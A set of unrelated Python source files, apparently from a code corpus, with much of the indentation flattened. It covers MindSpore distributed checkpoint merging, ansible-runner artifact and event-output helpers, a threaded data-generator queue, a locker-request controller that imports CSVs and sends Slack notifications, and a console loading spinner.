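def _parse_print_usage_sketch():
    """Hedged example: logs the type of every recovered entry (str or Tensor)."""
    entries = parse_print("./print_output")
    for entry in entries:
        logger.info("parsed print entry of type %s", type(entry).__name__)
    return entries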
def _merge_param_with_strategy(sliced_data, parameter_name, strategy, is_even):
"""
Merge data slices to one tensor with whole data when strategy is not None.
Args:
sliced_data (list[numpy.ndarray]): Data slices in order of rank_id.
parameter_name (str): Name of parameter.
strategy (dict): Parameter slice strategy.
is_even (bool): Slicing manner; True means the data is sliced evenly, False means it is sliced unevenly.
Returns:
Tensor, the merged Tensor which has the whole data.
Raises:
ValueError: Failed to merge.
"""
layout = strategy.get(parameter_name)
try:
dev_mat = list(layout.dev_matrix[0].dim)
tensor_map = list(layout.tensor_map[0].dim)
param_split_shape = list(layout.param_split_shape[0].dim)
field_size = int(layout.field)
except BaseException as e:
raise ValueError(f"{e.__str__()}. Please make sure that strategy matches the node_strategy.proto.")
device_count = 1
for dim in dev_mat:
device_count *= dim
if len(sliced_data) != device_count:
raise ValueError(f"The sliced_parameters length should be equal to device_count. "
f"the sliced_parameters length is {len(sliced_data)} but device_count is {device_count}.")
merged_tensor = None
if not param_split_shape:
if not is_even:
raise ValueError("The shape of every parameter in sliced_parameters should be the same "
"when slice manner is even.")
all_gather_tensor = Tensor(np.concatenate(sliced_data))
if field_size > 0:
from mindspore.parallel._tensor import _reshape_param_data_with_weight
merged_tensor = _reshape_param_data_with_weight(all_gather_tensor, dev_mat, field_size)
else:
from mindspore.parallel._tensor import _reshape_param_data
merged_tensor = _reshape_param_data(all_gather_tensor, dev_mat, tensor_map)
else:
from mindspore.parallel._tensor import _get_tensor_strategy, _get_tensor_slice_index
tensor_strategy = _get_tensor_strategy(dev_mat, tensor_map)
slice_count = 1
for dim in tensor_strategy:
slice_count *= dim
if len(param_split_shape) != slice_count:
raise ValueError(f"The param_split_shape length in strategy should be {slice_count}, "
f"but got {len(param_split_shape)}.")
tensor_slices_new = list(range(slice_count))
tensor_slices = sliced_data
for i in range(device_count):
slice_index = int(_get_tensor_slice_index(dev_mat, tensor_strategy, tensor_map, i))
if tensor_slices[i].shape[0] != param_split_shape[slice_index]:
raise ValueError(f"The slice {slice_index} is {param_split_shape[slice_index]} in 0 axis, "
f"but got {tensor_slices[i].shape[0]}.")
tensor_slices_new[slice_index] = np.array(tensor_slices[i])
dim_len = len(tensor_strategy)
for i in range(dim_len):
ele_count = int(len(tensor_slices_new) / tensor_strategy[dim_len - 1 - i])
tensor_slices_new_inner = []
for j in range(ele_count):
new_tensor = tensor_slices_new[j * tensor_strategy[dim_len - 1 - i]]
for l in range(j * tensor_strategy[dim_len - 1 - i] + 1,
(j + 1) * tensor_strategy[dim_len - 1 - i]):
new_tensor = np.concatenate((new_tensor, tensor_slices_new[l]), axis=dim_len - 1 - i)
tensor_slices_new_inner.insert(len(tensor_slices_new_inner), np.array(new_tensor))
tensor_slices_new = tensor_slices_new_inner
merged_tensor = Tensor(tensor_slices_new[0])
return merged_tensor
def build_searched_strategy(strategy_filename):
"""
Build strategy of every parameter in network.
Args:
strategy_filename (str): Name of strategy file.
Returns:
Dictionary, whose key is parameter name and value is slice strategy of this parameter.
Raises:
ValueError: Strategy file is incorrect.
TypeError: Strategy_filename is not str.
"""
if not isinstance(strategy_filename, str):
raise TypeError(f"The strategy_filename should be str, but got {type(strategy_filename)}.")
if not os.path.isfile(strategy_filename):
raise ValueError(f"No such strategy file: {strategy_filename}.")
if os.path.getsize(strategy_filename) == 0:
raise ValueError("The strategy file should not be empty.")
parallel_strategy_map = ParallelStrategyMap()
with open(strategy_filename, 'rb') as f:
pb_content = f.read()
parallel_strategy_map.ParseFromString(pb_content)
layout_items = parallel_strategy_map.parallel_layout_item
if not layout_items:
raise ValueError("The strategy file has no sliced parameter.")
strategy = {}
for layout_item in layout_items:
parameter_name = layout_item.param_name
layout = layout_item.parallel_layouts
strategy[parameter_name] = layout
return strategy
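# --- Illustrative usage sketch (not part of the original module) ---------------------------------
# The './strategy.ckpt' path is a placeholder for a strategy file saved during parallel training;
# this only shows how the returned dict maps parameter names to their slice layouts.
def _build_searched_strategy_usage_sketch():
    """Hedged example: lists which parameters have a recorded slice strategy."""
    strategy = build_searched_strategy("./strategy.ckpt")
    for param_name in strategy:
        logger.info("found slice strategy for parameter %s", param_name)
    return strategy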
def merge_sliced_parameter(sliced_parameters, strategy=None):
"""
Merge parameter slices to one whole parameter.
Args:
sliced_parameters (list[Parameter]): Parameter slices in order of rank_id.
strategy (Optional[dict]): Parameter slice strategy, whose key is parameter name and
value is slice strategy of this parameter. If strategy is None, just merge
parameter slices in 0 axis order. Default: None.
Returns:
Parameter, the merged parameter which has the whole data.
Raises:
ValueError: Failed to merge.
TypeError: The sliced_parameters is incorrect or strategy is not dict.
KeyError: The parameter name is not in keys of strategy.
Examples:
>>> from mindspore.common.parameter import Parameter
>>> from mindspore.train import merge_sliced_parameter
>>>
>>> sliced_parameters = [
... Parameter(Tensor(np.array([0.00023915, 0.00013939, -0.00098059])),
... "network.embedding_table"),
... Parameter(Tensor(np.array([0.00015815, 0.00015458, -0.00012125])),
... "network.embedding_table"),
... Parameter(Tensor(np.array([0.00042165, 0.00029692, -0.00007941])),
... "network.embedding_table"),
... Parameter(Tensor(np.array([0.00084451, 0.00089960, -0.00010431])),
... "network.embedding_table")]
>>> merged_parameter = merge_sliced_parameter(sliced_parameters)
"""
if not isinstance(sliced_parameters, list):
raise TypeError(f"The sliced_parameters should be list, but got {type(sliced_parameters)}.")
if not sliced_parameters:
raise ValueError("The sliced_parameters should not be empty.")
if strategy and not isinstance(strategy, dict):
raise TypeError(f"The strategy should be dict, but got {type(strategy)}.")
try:
parameter_name = sliced_parameters[0].name
parameter_shape = sliced_parameters[0].data.shape
parameter_shape_length = len(parameter_shape)
except BaseException as e:
raise TypeError(f"{e.__str__()}. the element in sliced_parameters should be Parameter.")
is_even = True
for index, parameter in enumerate(sliced_parameters):
if not isinstance(parameter, Parameter):
raise TypeError(f"The element in sliced_parameters should be Parameter, "
f"but got {type(parameter)} at index {index}.")
if parameter.name != parameter_name \
or len(parameter.data.shape) != parameter_shape_length \
or parameter.data.shape[1:] != parameter_shape[1:]:
raise ValueError("Please make sure that the elements in slice_parameters have the same name, "
"dimension length and shape except 0 axis")
if parameter.data.shape != parameter_shape:
is_even = False
layerwise_parallel = sliced_parameters[0].layerwise_parallel
requires_grad = sliced_parameters[0].requires_grad
sliced_data = [parameter.data.asnumpy() for parameter in sliced_parameters]
merged_parameter = None
if not strategy:
merged_tensor = Tensor(np.concatenate(sliced_data))
merged_parameter = Parameter(merged_tensor, parameter_name, requires_grad, layerwise_parallel)
else:
if parameter_name not in strategy.keys():
raise KeyError(f"The parameter name should be one key of strategy. "
f"the parameter name is {parameter_name}.")
merged_tensor = _merge_param_with_strategy(sliced_data, parameter_name, strategy, is_even)
merged_parameter = Parameter(merged_tensor, parameter_name, requires_grad, layerwise_parallel)
return merged_parameter
def load_distributed_checkpoint(network, checkpoint_filenames, predict_strategy=None):
"""
Load checkpoint into net for distributed prediction.
Args:
network (Cell): Network for distributed prediction.
checkpoint_filenames (list(str)): The name of Checkpoint files
in order of rank id.
predict_strategy (Optional(dict)): Strategy of the prediction process, whose key
is parameter name, and value is a list or a tuple that the first four
elements are [dev_matrix, tensor_map, param_split_shape, field]. If None,
it means that the prediction process just uses a single device.
Default: None.
Raises:
TypeError: The type of inputs do not match the requirements.
ValueError: Failed to load checkpoint into net.
"""
network = Validator.check_isinstance("network", network, nn.Cell)
for index, filename in enumerate(checkpoint_filenames):
if not isinstance(filename, str) or not os.path.exists(filename) \
or filename[-5:] != ".ckpt" or os.path.getsize(filename) == 0:
raise ValueError(f"Please make sure that the {filename} at index {index} is a valid checkpoint file.")
if not _check_predict_strategy(predict_strategy):
raise ValueError(f"Please make sure that the key of predict_strategy is str, "
f"and the value is a list or a tuple that the first four elements are "
f"dev_matrix (list[int]), tensor_map (list[int]), "
f"param_split_shape (list[int]) and field_size (zero).")
train_strategy_filename = context.get_auto_parallel_context("strategy_ckpt_load_file")
_train_strategy = build_searched_strategy(train_strategy_filename)
train_strategy = _convert_to_list(_train_strategy)
train_dev_count = 1
for dim in train_strategy[list(train_strategy.keys())[0]][0]:
train_dev_count *= dim
if train_dev_count != len(checkpoint_filenames):
raise ValueError(
f"The length of checkpoint_filenames should be equal to the device count of training process. "
f"The length is {len(checkpoint_filenames)} but the device count is {train_dev_count}.")
rank_list = _infer_rank_list(train_strategy, predict_strategy)
param_dict = {}
for _, param in network.parameters_and_names():
sliced_params = []
if param.name not in rank_list.keys():
continue
param_rank = rank_list[param.name][0]
skip_merge_split = rank_list[param.name][1]
for rank in param_rank:
sliced_param = _load_single_param(checkpoint_filenames[rank], param.name)
sliced_params.append(sliced_param)
if skip_merge_split:
split_param = sliced_params[0]
else:
param_unique_strategy = _remove_repeated_slices(train_strategy[param.name])
_param_unique_strategy = _convert_to_layout(param.name, param_unique_strategy)
split_param = _merge_and_split(sliced_params, _param_unique_strategy, predict_strategy)
param_dict[param.name] = split_param
load_param_into_net(network, param_dict)
def _check_predict_strategy(predict_strategy):
"""Check predict strategy."""
def _check_int_list(arg):
if not isinstance(arg, list):
return False
for item in arg:
if not isinstance(item, int):
return False
return True
if predict_strategy is None:
return True
predict_strategy = Validator.check_isinstance("predict_strategy", predict_strategy, dict)
for key in predict_strategy.keys():
if not isinstance(key, str) or not isinstance(predict_strategy[key], (list, tuple)) \
or len(predict_strategy[key]) < 4:
return False
dev_matrix, tensor_map, param_split_shape, field_size = predict_strategy[key][:4]
if not _check_int_list(dev_matrix) or not _check_int_list(tensor_map) or \
not (_check_int_list(param_split_shape) or not param_split_shape) or \
not (isinstance(field_size, int) and field_size == 0):
return False
return True
def _convert_to_list(strategy):
"""Convert ParallelLayouts object to specified list."""
train_map = {}
for param_name in strategy.keys():
try:
layout = strategy.get(param_name)
dev_mat = list(layout.dev_matrix[0].dim)
tensor_map = list(layout.tensor_map[0].dim)
param_split_shape = list(layout.param_split_shape[0].dim)
field_size = int(layout.field)
train_map[param_name] = [dev_mat, tensor_map, param_split_shape, field_size]
except BaseException as e:
raise ValueError(f"{e.__str__()}. Please make sure that strategy matches the node_strategy.proto.")
return train_map
def _convert_to_layout(param_name, tensor_layout):
"""Convert list to ParallelLayouts object."""
strategy = {}
try:
layout = ParallelLayouts()
layout.field = tensor_layout[3]
dev_matrix = layout.dev_matrix.add()
for item in tensor_layout[0]:
dev_matrix.dim.append(item)
tensor_map = layout.tensor_map.add()
for item in tensor_layout[1]:
tensor_map.dim.append(item)
param_split_shape = layout.param_split_shape.add()
for item in tensor_layout[2]:
param_split_shape.dim.append(item)
except BaseException as e:
raise ValueError("Convert failed. " + e.__str__())
strategy[param_name] = layout
return strategy
def _merge_and_split(sliced_params, train_strategy, predict_strategy):
"""Merge sliced parameter and split it according to the predict strategy."""
merged_param = merge_sliced_parameter(sliced_params, train_strategy)
if predict_strategy is None:
return merged_param
param_name = merged_param.name
tensor_layout = predict_strategy[param_name]
split_tensor = _load_tensor(merged_param.data, tensor_layout[0], tensor_layout[1])
requires_grad = merged_param.requires_grad
layerwise_parallel = merged_param.layerwise_parallel
split_param = Parameter(split_tensor, param_name, requires_grad, layerwise_parallel)
return split_param
def _load_single_param(ckpt_file_name, param_name):
"""Load a parameter from checkpoint."""
checkpoint_list = Checkpoint()
try:
with open(ckpt_file_name, "rb") as f:
pb_content = f.read()
checkpoint_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the checkpoint file `%s` during load single parameter,"
" please check the correct of the file.", ckpt_file_name)
raise ValueError(e.__str__())
parameter = None
try:
param_data_list = []
for element_id, element in enumerate(checkpoint_list.value):
if element.tag != param_name:
continue
data = element.tensor.tensor_content
data_type = element.tensor.tensor_type
np_type = tensor_to_np_type[data_type]
ms_type = tensor_to_ms_type[data_type]
element_data = np.frombuffer(data, np_type)
param_data_list.append(element_data)
if (element_id == len(checkpoint_list.value) - 1) or \
(element.tag != checkpoint_list.value[element_id + 1].tag):
param_data = np.concatenate((param_data_list), axis=0)
param_data_list.clear()
dims = element.tensor.dims
if dims == [0]:
if 'Float' in data_type:
param_data = float(param_data[0])
elif 'Int' in data_type:
param_data = int(param_data[0])
parameter = Parameter(Tensor(param_data, ms_type), name=element.tag)
elif dims == [1]:
parameter = Parameter(Tensor(param_data, ms_type), name=element.tag)
else:
param_dim = []
for dim in dims:
param_dim.append(dim)
param_value = param_data.reshape(param_dim)
parameter = Parameter(Tensor(param_value, ms_type), name=element.tag)
break
except BaseException as e:
logger.error("Failed to load the checkpoint file `%s`.", ckpt_file_name)
raise RuntimeError(e.__str__())
if parameter is None:
raise ValueError(f"There is no parameter named {param_name} in this checkpoint file {ckpt_file_name}, "
f"please check parameter name or checkpoint file.")
return parameter
|
utils.py
|
import json
import sys
import re
import os
import stat
import fcntl
import shutil
import hashlib
import tempfile
import subprocess
import base64
import threading
import pipes
import uuid
import codecs
try:
from collections.abc import Iterable, Mapping
except ImportError:
from collections import Iterable, Mapping
from io import StringIO
from six import string_types, PY2, PY3, text_type, binary_type
class Bunch(object):
'''
Collect a bunch of variables together in an object.
This is a slight modification of Alex Martelli's and Doug Hudgeon's Bunch pattern.
'''
def __init__(self, **kwargs):
self.update(**kwargs)
def update(self, **kwargs):
self.__dict__.update(kwargs)
def isplaybook(obj):
'''
Inspects the object and returns if it is a playbook
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is a list and False if it is not
'''
return isinstance(obj, Iterable) and (not isinstance(obj, string_types) and not isinstance(obj, Mapping))
def isinventory(obj):
'''
Inspects the object and returns if it is an inventory
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is an inventory dict and False if it is not
'''
return isinstance(obj, Mapping) or isinstance(obj, string_types)
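# Illustrative examples of the two predicates above (a sketch, not executed here):
#   isplaybook([{'hosts': 'all', 'tasks': []}])  -> True   (a list of plays)
#   isplaybook('site.yml')                       -> False  (strings are not playbooks)
#   isinventory({'all': {'hosts': {}}})          -> True   (mapping form)
#   isinventory('/path/to/hosts')                -> True   (path/string form)
#   isinventory([1, 2, 3])                       -> False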
def check_isolation_executable_installed(isolation_executable):
'''
    Check that the requested isolation executable (e.g. bwrap or proot) is installed.
'''
cmd = [isolation_executable, '--version']
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
return bool(proc.returncode == 0)
except (OSError, ValueError) as e:
if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory
            raise RuntimeError('{} unavailable for unexpected reason.'.format(isolation_executable))
return False
def dump_artifact(obj, path, filename=None):
'''
Write the artifact to disk at the specified path
Args:
obj (string): The string object to be dumped to disk in the specified
path. The artifact filename will be automatically created
path (string): The full path to the artifacts data directory.
filename (string, optional): The name of file to write the artifact to.
If the filename is not provided, then one will be generated.
Returns:
string: The full path filename for the artifact that was generated
'''
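    # Usage sketch (hypothetical values, shown for illustration only):
    #   path = dump_artifact(json.dumps({'hosts': 'all'}), '/tmp/private/env', 'extravars')
    # The file is only rewritten when its SHA1 differs from the new content, and
    # writes are serialized through the '.artifact_write_lock' lock file below.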
p_sha1 = None
if not os.path.exists(path):
os.makedirs(path, mode=0o700)
else:
p_sha1 = hashlib.sha1()
p_sha1.update(obj.encode(encoding='UTF-8'))
if filename is None:
fd, fn = tempfile.mkstemp(dir=path)
else:
fn = os.path.join(path, filename)
if os.path.exists(fn):
c_sha1 = hashlib.sha1()
with open(fn) as f:
contents = f.read()
c_sha1.update(contents.encode(encoding='UTF-8'))
if not os.path.exists(fn) or p_sha1.hexdigest() != c_sha1.hexdigest():
lock_fp = os.path.join(path, '.artifact_write_lock')
lock_fd = os.open(lock_fp, os.O_RDWR | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR)
fcntl.lockf(lock_fd, fcntl.LOCK_EX)
try:
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR)
f.write(str(obj))
finally:
fcntl.lockf(lock_fd, fcntl.LOCK_UN)
os.close(lock_fd)
os.remove(lock_fp)
return fn
def cleanup_artifact_dir(path, num_keep=0):
# 0 disables artifact dir cleanup/rotation
if num_keep < 1:
return
all_paths = sorted([os.path.join(path, p) for p in os.listdir(path)],
key=lambda x: os.path.getmtime(x))
total_remove = len(all_paths) - num_keep
for f in range(total_remove):
shutil.rmtree(all_paths[f])
def dump_artifacts(kwargs):
'''
Introspect the kwargs and dump objects to disk
'''
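    # A hypothetical kwargs dict this function is designed to handle (values are
    # illustrative, not taken from this module):
    #   {'private_data_dir': '/tmp/demo',
    #    'playbook': [{'hosts': 'all', 'tasks': []}],
    #    'inventory': {'all': {'hosts': {'localhost': None}}},
    #    'extravars': {'x': 1}}
    # Playbook/inventory objects are serialized into the project/ and inventory/
    # directories, and env-style keys are written under env/ then popped from kwargs.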
private_data_dir = kwargs.get('private_data_dir')
if not private_data_dir:
private_data_dir = tempfile.mkdtemp()
kwargs['private_data_dir'] = private_data_dir
if not os.path.exists(private_data_dir):
raise ValueError('private_data_dir path is either invalid or does not exist')
if 'role' in kwargs:
role = {'name': kwargs.pop('role')}
if 'role_vars' in kwargs:
role['vars'] = kwargs.pop('role_vars')
play = [{'hosts': kwargs.pop('hosts', 'all'), 'roles': [role]}]
if kwargs.pop('role_skip_facts', False):
play[0]['gather_facts'] = False
kwargs['playbook'] = play
if 'envvars' not in kwargs:
kwargs['envvars'] = {}
roles_path = kwargs.pop('roles_path', None)
if not roles_path:
roles_path = os.path.join(private_data_dir, 'roles')
else:
roles_path += ':{}'.format(os.path.join(private_data_dir, 'roles'))
kwargs['envvars']['ANSIBLE_ROLES_PATH'] = roles_path
obj = kwargs.get('playbook')
if obj and isplaybook(obj):
path = os.path.join(private_data_dir, 'project')
kwargs['playbook'] = dump_artifact(json.dumps(obj), path, 'main.json')
obj = kwargs.get('inventory')
if obj and isinventory(obj):
path = os.path.join(private_data_dir, 'inventory')
if isinstance(obj, Mapping):
kwargs['inventory'] = dump_artifact(json.dumps(obj), path, 'hosts.json')
elif isinstance(obj, string_types):
if not os.path.exists(os.path.join(path,obj)):
kwargs['inventory'] = dump_artifact(obj, path, 'hosts')
else:
kwargs['inventory'] = os.path.join(path,obj)
for key in ('envvars', 'extravars', 'passwords', 'settings'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(json.dumps(obj), path, key)
kwargs.pop(key)
for key in ('ssh_key', 'cmdline'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(str(kwargs[key]), path, key)
kwargs.pop(key)
def collect_new_events(event_path,old_events):
'''
Collect new events for the 'events' generator property
'''
dir_events = os.listdir(event_path)
dir_events_actual = []
for each_file in dir_events:
if re.match("^[0-9]+-.+json$", each_file):
            if '-partial' not in each_file and each_file not in old_events:
dir_events_actual.append(each_file)
dir_events_actual.sort(key=lambda filenm: int(filenm.split("-", 1)[0]))
for event_file in dir_events_actual:
with codecs.open(os.path.join(event_path, event_file), 'r', encoding='utf-8') as event_file_actual:
try:
event = json.load(event_file_actual)
except ValueError:
break
old_events[event_file] = True
yield event, old_events
class OutputEventFilter(object):
'''
File-like object that looks for encoded job events in stdout data.
'''
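    # The regex below matches the encoded event token format: a base64 JSON
    # payload broken into chunks, each chunk followed by an ANSI "cursor left"
    # sequence (\x1b[<n>D), with the whole token wrapped on both sides by the
    # ANSI "erase line" sequence (\x1b[K).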
EVENT_DATA_RE = re.compile(r'\x1b\[K((?:[A-Za-z0-9+/=]+\x1b\[\d+D)+)\x1b\[K')
def __init__(self, handle, event_callback,
suppress_ansible_output=False, output_json=False):
self._event_callback = event_callback
self._counter = 0
self._start_line = 0
self._handle = handle
self._buffer = StringIO()
self._last_chunk = ''
self._current_event_data = None
self.output_json = output_json
self.suppress_ansible_output = suppress_ansible_output
def flush(self):
self._handle.flush()
def write(self, data):
self._buffer.write(data)
# keep a sliding window of the last chunk written so we can detect
# event tokens and determine if we need to perform a search of the full
# buffer
should_search = '\x1b[K' in (self._last_chunk + data)
self._last_chunk = data
# Only bother searching the buffer if we recently saw a start/end
# token (\x1b[K)
while should_search:
value = self._buffer.getvalue()
match = self.EVENT_DATA_RE.search(value)
if not match:
break
try:
base64_data = re.sub(r'\x1b\[\d+D', '', match.group(1))
event_data = json.loads(base64.b64decode(base64_data).decode('utf-8'))
except ValueError:
event_data = {}
event_data = self._emit_event(value[:match.start()], event_data)
if not self.output_json:
stdout_actual = event_data['stdout'] if 'stdout' in event_data else None
else:
stdout_actual = json.dumps(event_data)
remainder = value[match.end():]
self._buffer = StringIO()
self._buffer.write(remainder)
if stdout_actual and stdout_actual != "{}":
if not self.suppress_ansible_output:
sys.stdout.write(
stdout_actual.encode('utf-8') if PY2 else stdout_actual
)
sys.stdout.write("\n")
sys.stdout.flush()
self._handle.write(stdout_actual + "\n")
self._handle.flush()
self._last_chunk = remainder
else:
if not self.suppress_ansible_output:
sys.stdout.write(
data.encode('utf-8') if PY2 else data
)
self._handle.write(data)
self._handle.flush()
# Verbose stdout outside of event data context
if data and '\n' in data and self._current_event_data is None:
# emit events for all complete lines we know about
lines = self._buffer.getvalue().splitlines(True) # keep ends
remainder = None
# if last line is not a complete line, then exclude it
if '\n' not in lines[-1]:
remainder = lines.pop()
# emit all complete lines
for line in lines:
self._emit_event(line)
self._buffer = StringIO()
# put final partial line back on buffer
if remainder:
self._buffer.write(remainder)
def close(self):
value = self._buffer.getvalue()
if value:
self._emit_event(value)
self._buffer = StringIO()
self._event_callback(dict(event='EOF'))
self._handle.close()
def _emit_event(self, buffered_stdout, next_event_data=None):
next_event_data = next_event_data or {}
if self._current_event_data:
event_data = self._current_event_data
stdout_chunks = [buffered_stdout]
elif buffered_stdout:
event_data = dict(event='verbose')
stdout_chunks = buffered_stdout.splitlines(True)
else:
event_data = dict()
stdout_chunks = []
for stdout_chunk in stdout_chunks:
if event_data.get('event') == 'verbose':
event_data['uuid'] = str(uuid.uuid4())
self._counter += 1
event_data['counter'] = self._counter
event_data['stdout'] = stdout_chunk[:-2] if len(stdout_chunk) > 2 else ""
n_lines = stdout_chunk.count('\n')
event_data['start_line'] = self._start_line
event_data['end_line'] = self._start_line + n_lines
self._start_line += n_lines
if self._event_callback:
self._event_callback(event_data)
if next_event_data.get('uuid', None):
self._current_event_data = next_event_data
else:
self._current_event_data = None
return event_data
def open_fifo_write(path, data):
'''open_fifo_write opens the fifo named pipe in a new thread.
This blocks the thread until an external process (such as ssh-agent)
reads data from the pipe.
'''
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)).start()
def args2cmdline(*args):
return ' '.join([pipes.quote(a) for a in args])
def ensure_str(s, encoding='utf-8', errors='strict'):
"""
Copied from six==1.12
Coerce *s* to `str`.
For Python 2:
- `unicode` -> encoded to `str`
- `str` -> `str`
For Python 3:
- `str` -> `str`
- `bytes` -> decoded to `str`
"""
if not isinstance(s, (text_type, binary_type)):
raise TypeError("not expecting type '%s'" % type(s))
if PY2 and isinstance(s, text_type):
s = s.encode(encoding, errors)
elif PY3 and isinstance(s, binary_type):
s = s.decode(encoding, errors)
return s
|
data_util.py
|
'''
This file is modified from the Keras implementation of multi-threaded data processing;
see https://github.com/fchollet/keras/blob/master/keras/utils/data_utils.py
'''
import time
import numpy as np
import threading
import multiprocessing
try:
import queue
except ImportError:
import Queue as queue
class GeneratorEnqueuer():
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
            will be incremented by one for each worker.
"""
def __init__(self, generator,
use_multiprocessing=False,
wait_time=0.05,
random_seed=None):
self.wait_time = wait_time
self._generator = generator
self._use_multiprocessing = use_multiprocessing
self._threads = []
self._stop_event = None
self.queue = None
self.random_seed = random_seed
def start(self, workers=1, max_queue_size=10):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`)
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self._use_multiprocessing or self.queue.qsize() < max_queue_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(self.wait_time)
except Exception:
self._stop_event.set()
raise
try:
if self._use_multiprocessing:
self.queue = multiprocessing.Queue(maxsize=max_queue_size)
self._stop_event = multiprocessing.Event()
else:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
if self._use_multiprocessing:
# Reset random seed else all children processes
# share the same seed
np.random.seed(self.random_seed)
thread = multiprocessing.Process(target=data_generator_task)
thread.daemon = False
if self.random_seed is not None:
self.random_seed += 1
else:
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`.
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
if self._use_multiprocessing:
thread.terminate()
else:
thread.join(timeout)
if self._use_multiprocessing:
if self.queue is not None:
self.queue.close()
self._threads = []
self._stop_event = None
self.queue = None
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
A generator
"""
while self.is_running():
if not self.queue.empty():
inputs = self.queue.get()
if inputs is not None:
yield inputs
else:
time.sleep(self.wait_time)
|
home_controller.py
|
from app.controllers.base_controller import BaseController
from app.repositories.request_repo import RequestRepo
from app.utils import request_status_text, request_item_title, floor_wings
from app.utils.slackhelper import SlackHelper
import pandas as pd
from app.repositories.user_repo import UserRepo
from app.models.locker import Locker
import threading
import humanize
class HomeController(BaseController):
def __init__(self, request):
BaseController.__init__(self, request)
self.request_repo = RequestRepo()
self.slackhelper = SlackHelper()
def home_page(self):
all_requests = self.request_repo.list_requests()
return self.handle_response('OK', payload={'requests': all_requests[0], 'meta': all_requests[1]})
def update_request_status(self, request_id):
msg, status = self.request_params('msg', 'status')
try:
status_text = request_status_text(status)
request_obj = self.request_repo.get(request_id)
if request_obj:
                # This request has already been marked as completed. No updates allowed.
if request_obj.status == 2:
return self.handle_response(msg='This request has already been marked as completed. No Updates allowed', status_code=400)
# Update Request Object
self.request_repo.update(request_obj, **{'status': status})
slack_msg = f'''
```Request Update \n
RequestID: {request_obj.id} \n
Item Requested: {request_item_title(request_obj.item)} \n
Status: {status_text} \n
Staff Message: {msg}```
'''
self.slackhelper.post_message(msg=slack_msg, recipient=request_obj.user.slack_id)
return self.handle_response('OK', payload={'request': self.request_repo.serialize_request_response(request_obj)})
except Exception as e:
return self.handle_response(msg='Invalid Status ID Provided', status_code=400)
def import_data(self):
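        # Expected CSV layout (positional, as read below): column 1 = email,
        # 2 = name, 3 = locker number, 4 = status, 5 = floor name, 6 = wing name.
        # Rows with a missing (NaN/float) email or a 'free' status create an
        # unassigned locker; otherwise the locker is assigned to the matched
        # Slack user and a notification is sent from a background thread.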
issues = []
page_number, = self.get_params('page')
csv = pd.read_csv(f'lockers-{page_number}.csv', )
for row in csv.itertuples():
email = row[1]
name = row[2]
locker_number = row[3]
status = row[4]
floor = row[5].lower()
wing = row[6].lower()
if floor == 'fifth':
floor_id = 5
if floor == 'fourth':
floor_id = 4
if floor == 'third':
floor_id = 3
if floor == 'first':
floor_id = 1
if wing == 'eko':
wing_id = 7
if wing == 'bay':
wing_id = 6
if wing == 'big apple':
wing_id = 5
if wing == 'safari':
wing_id = 4
if wing == 'kampala':
wing_id = 3
if wing == 'naija':
wing_id = 2
if wing == 'gold coast':
wing_id = 1
if type(email) is str:
first_name = name.split()[0]
last_name = name.split()[-1]
print(first_name, last_name)
slack_user = self.slackhelper.find_by_email(email)
if slack_user['ok'] is False:
missing_users = {'name': name, 'email': email, 'locker': locker_number, 'floor': floor, 'wing': wing}
issues.append(missing_users)
locker = Locker(locker_number=locker_number, floor=floor_id, wing=wing_id, status=0)
locker.save()
else:
slack_id = slack_user['user']['id']
user = UserRepo().find_or_create(email=email, **{'first_name': first_name, 'last_name': last_name, 'slack_id': slack_id})
locker = Locker(locker_number=locker_number, floor=floor_id, wing=wing_id, user_id=user.id, status=1)
locker.save()
msg = f'Hi {first_name}, \n' \
f'You currently are assigned locker number {locker_number} on the {humanize.ordinal(int(floor_id))} floor {floor_wings(int(wing_id))} wing. \n' \
f'If this information is wrong, please reach out to the facilities team for correction. If correct, kindly ignore this message and have a great day.\n' \
f'`Genie`'
t = threading.Thread(target=self.slackhelper.post_message, args=(msg, slack_id))
t.daemon = True
t.start()
            if type(email) is float or status.lower() == 'free':
locker = Locker(locker_number=locker_number, floor=floor_id, wing=wing_id, status=0)
locker.save()
return self.handle_response('OK', payload={'missing users': issues, 'info': 'Invalid or Ex-Andela Staff. Their Lockers have been marked as available by default.'})
|
loadingAnimation.py
|
#!/usr/bin/env python3.6
# -*- coding: utf-8 -*-
# @Author: KevinMidboe
# @Date: 2017-07-30 13:53:38
# @Last Modified by: KevinMidboe
# @Last Modified time: 2017-07-30 13:53:46
import itertools
from threading import Thread
from time import sleep
from sys import stdout
class LoadingAnimation(object):
def __init__(self):
self.done = False
def start(self):
t = Thread(target=self.animate)
t.start()
def animate(self):
for c in itertools.cycle(['|', '/', '-', '\\']):
if self.done:
break
stdout.write('\rFetching ' + c)
stdout.flush()
sleep(0.1)
